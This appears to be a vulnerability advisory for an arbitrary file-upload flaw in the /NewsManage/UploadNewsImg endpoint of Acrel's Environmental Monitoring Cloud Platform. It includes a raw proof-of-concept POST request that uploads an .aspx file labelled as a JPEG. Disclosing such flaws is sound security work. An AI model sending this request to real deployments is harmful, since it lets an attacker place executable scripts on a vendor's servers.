Acrel Electric Co., Ltd. - Environmental Monitoring Cloud Platform

File upload vulnerability in Acrel - Environmental Monitoring Cloud Platform

Affected Version:  Acrel - Environmental Monitoring Cloud Platform ≤all

Vendor:  https://ems.acrel.cn/

Software:  Environmental Monitoring Cloud Platform

Vulnerability Files:

• /NewsManage/UploadNewsImg

Description:

The /NewsManage/UploadNewsImg interface does not impose strict restrictions on uploaded files, resulting in a vulnerability that allows arbitrary file uploads.

Proof of Concept:

POST /NewsManage/UploadNewsImg HTTP/1.1 Host: xx.xx.xx.xx Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfjKBvGWJbG07Z02r User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept: / Content-Length: 186

-----WebKitFormBoundaryfjKBvGWJbG07Z02r Content-Disposition: form-data; name="file"; filename="test.aspx" Content-Type: image/jpeg

test ------WebKitFormBoundaryfjKBvGWJbG07Z02r-

case1